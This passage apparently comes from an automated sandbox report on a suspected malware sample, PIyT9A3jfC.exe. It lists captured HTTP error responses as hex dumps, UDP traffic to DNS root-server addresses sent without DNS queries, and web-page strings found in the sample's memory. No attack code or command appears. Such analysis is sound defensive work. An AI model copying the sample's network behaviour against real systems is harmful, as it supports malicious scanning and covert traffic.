                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:41 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:44:49 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BU6CeYiVddN3NWY1OGYwMTU4MGIxNmI3ZTdmYzE0NzYwMWVmNGQw;Path=/X-Contextid: 2xdHtXuo/SfUXScHtData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:51 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:45:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:45:08 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:45:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:45:27 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a67g9K5n16vtZQy2RYOH%2FWxAlF5YkL9gCqnfwCiCZvSrdpvkh5Z4OXO4z%2F1wzubEwtuef3dAZVaWhV1FjQ2Vtrg1KbEheGnHzNNVatPDqb2m7gq3VtTsl7VdOaHW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed761a7f8585bf5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:45:13 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:45:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BZHoRYPKWXihZmZiYzI5YzM0YTQ0MmQ5NDE4YzY5ODNhZmEwMGFm;Path=/X-Contextid: MjS44ToY/a7gcK19mData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.203.230.10
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.36.148.17
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.5.5.241
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.5.5.241
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.58.128.30
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.33.4.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.33.4.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 192.58.128.30
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: unknownUDP traffic detected without corresponding DNS query: 198.32.64.12
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></noscript></a> equals www.linkedin.com (Linkedin)
